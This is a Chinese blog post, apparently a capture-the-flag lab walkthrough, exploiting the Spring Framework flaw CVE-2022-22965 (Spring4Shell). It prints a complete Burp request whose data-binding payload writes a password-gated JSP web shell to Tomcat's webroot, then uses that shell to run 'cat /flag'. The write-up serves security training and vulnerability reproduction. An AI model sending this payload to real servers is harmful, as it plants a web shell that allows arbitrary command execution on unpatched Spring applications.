春秋云境:CVE-2022-22965

已于 2024-03-08 12:57:41 修改
阅读量826 收藏
点赞数
分类专栏: 春秋云境-靶场 文章标签: java 开发语言
于 2023-01-20 15:28:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/laobanjiull/article/details/128741944
版权

春秋云境:CVE-2022-22965

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】免费查看更多内容……

Spring Framework JDK >= 9 远程代码执行漏洞:CVE-2022-22965

在这里插入图片描述

漏洞介绍

Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。

解题步骤

题外话:
这个靶场和我之前做的一个漏洞复现类似,文章在此处:CVE-2022-22965:Spring远程代码执行漏洞

  1. 访问URL
    在这里插入图片描述

  2. 进行BurpSuite抓包,并发送到【Repeater】模块
    在这里插入图片描述

  3. 修改数据包为如下:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

在这里插入图片描述

  1. 访问上传的JSP,并查看flag:http://x.x.x.x/tomcatwar.jsp?pwd=j&cmd=cat%20/flag
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

漏洞分析】 CVE-2022-22965-Spring漏洞Spring4Shell)环搭建及漏洞分析
Zt_Zk的博客
08-25 1376
漏洞分析】 CVE-2022-22965-Spring漏洞Spring4Shell)分析及修复方法
春秋.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1174
春秋.com】CVE-2022-32991思路
[春秋镜]CVE-2022-22965
niubi707的博客
11-29 998
[春秋镜]CVE-2022-22965复现
春秋镜 :CVE-2022-22965Spring Framework JDK= 9 远程代码执行漏洞
m0_65712192的博客
07-27 1247
靶标介绍:Spring frameworkSpring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。
CVE-2022-22965~框架漏洞春秋靶场渗透】
weixin_67832625的博客
08-10 536
本文详细介绍了对春秋靶场的渗透,然后对靶场渗透也做了最详细的介绍
CVE-2022-22965
最新发布
a666666688的博客
08-10 421
【代码】CVE-2022-22965
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 772
春秋CVE-2022-32991 Web Based Quiz System SQL注入
春秋镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2714
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
Apache commons-text和Configuration 命令执行CVE-2022-42889/CVE-2022-33980分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-15 2409
Apache commons-text/Configuration 命令执行CVE-2022-42889CVE-2022-33980分析
Spring Rce 漏洞分析CVE-2022-22965
热门推荐
god_Zeo的安全博客
04-07 1万+
0x01 漏洞介绍 Spring Framework 是一个开源的轻量级J2EE应用程序开发框架。 3月31日,VMware发布安全公告,修复了Spring Framework中的远程代码执行漏洞CVE-2022-22965)。在 JDK 9 及以上版本环下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。 0x02 影响范围 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEAS
CVE-2022-22965漏洞复现
Foreverlove112的博客
10-01 578
CVE-2022-22965漏洞复现
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 4091
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4102
CVE-2022-22965 Spring远程代码执行漏洞复现
cve-2022-22965是什么,一个至少超越我此刻理解力的漏洞
分享博主日常学习和使用的一些技术
03-31 3232
如果说我上一篇文章中介绍的spring-cloud-function的rce还在我的理解范围之内,那么cve-2022-22965已经超出我的理解范围了。也许未来的某一天我有兴趣研究它,但是现在我完全不了解它。 只能摘抄一下 CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+ Severity High Vendor Spring by VMware Description A Spring MVC or Spring WebF
CVE-2022-22965spring参数绑定漏洞
TengChuanB的博客
12-16 2366
cve-2022-22965
CVE-2022-22965Spring远程代码执行漏洞
m0_67392273的博客
07-31 455
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。SpringframeworkSpring里面的一个基础开源框架,其目的是用于简化Java企业级应用的开发难度和开发周期,2022年3月31日,VMwareTanzu发布漏洞报告,SpringFramework存在远程代码执行漏洞,在JDK9+上运行的SpringMVC或SpringWebFlux应用程序可能容易受到通过数据绑定的远程代码执行(RCE)的攻击。...
Spring 框架远程代码执行漏洞CVE-2022-22965
panda的博客
04-08 4945
Spring 框架远程代码执行漏洞(CVE-2022-22965)
Spring RCE 0day高危漏洞预警(CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+)后续来了
罗小爬的技术宝书
04-01 1179
Spring官方发布了CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+声明以及最新的修复版本。
春秋CVE-2022-29464
07-28
- *1* [【春秋CVE-2022-29464](https://blog.youkuaiyun.com/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值